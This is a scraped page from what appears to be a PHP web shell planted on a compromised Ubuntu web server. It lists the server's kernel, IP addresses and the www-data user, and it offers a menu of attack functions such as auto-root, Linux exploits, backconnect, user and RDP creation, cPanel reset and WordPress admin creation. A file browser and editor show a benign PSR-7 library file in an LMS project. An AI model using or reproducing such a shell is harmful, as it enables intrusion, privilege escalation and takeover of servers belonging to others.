Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
lms-api-8 /
vendor /
nyholm /
psr7 /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Factory
[ DIR ]
drwxrwxr-x
MessageTrait.php
7.25
KB
-rwxrwxr-x
Request.php
1.32
KB
-rwxrwxr-x
RequestTrait.php
2.9
KB
-rwxrwxr-x
Response.php
4.18
KB
-rwxrwxr-x
ServerRequest.php
4.78
KB
-rwxrwxr-x
Stream.php
10.94
KB
-rwxrwxr-x
StreamTrait.php
1.44
KB
-rwxrwxr-x
UploadedFile.php
5.4
KB
-rwxrwxr-x
Uri.php
9.51
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Request.php
<?php declare(strict_types=1); namespace Nyholm\Psr7; use Psr\Http\Message\{RequestInterface, StreamInterface, UriInterface}; /** * @author Tobias Nyholm <tobias.nyholm@gmail.com> * @author Martijn van der Ven <martijn@vanderven.se> * * @final This class should never be extended. See https://github.com/Nyholm/psr7/blob/master/doc/final.md */ class Request implements RequestInterface { use MessageTrait; use RequestTrait; /** * @param string $method HTTP method * @param string|UriInterface $uri URI * @param array $headers Request headers * @param string|resource|StreamInterface|null $body Request body * @param string $version Protocol version */ public function __construct(string $method, $uri, array $headers = [], $body = null, string $version = '1.1') { if (!($uri instanceof UriInterface)) { $uri = new Uri($uri); } $this->method = $method; $this->uri = $uri; $this->setHeaders($headers); $this->protocol = $version; if (!$this->hasHeader('Host')) { $this->updateHostFromUri(); } // If we got no body, defer initialization of the stream until Request::getBody() if ('' !== $body && null !== $body) { $this->stream = Stream::create($body); } } }
Close